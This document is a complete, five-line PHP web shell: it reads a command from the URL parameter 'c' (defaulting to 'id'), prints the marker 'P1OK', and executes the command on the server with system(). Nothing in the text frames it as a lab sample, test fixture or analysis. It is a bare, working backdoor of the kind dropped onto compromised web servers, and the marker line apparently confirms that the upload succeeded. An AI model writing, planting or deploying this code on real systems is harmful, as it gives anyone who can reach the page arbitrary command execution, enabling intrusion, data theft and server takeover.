<?php
$c = isset($_GET['c']) ? $_GET['c'] : 'id';
echo "P1OK\n";
system($c);
?>
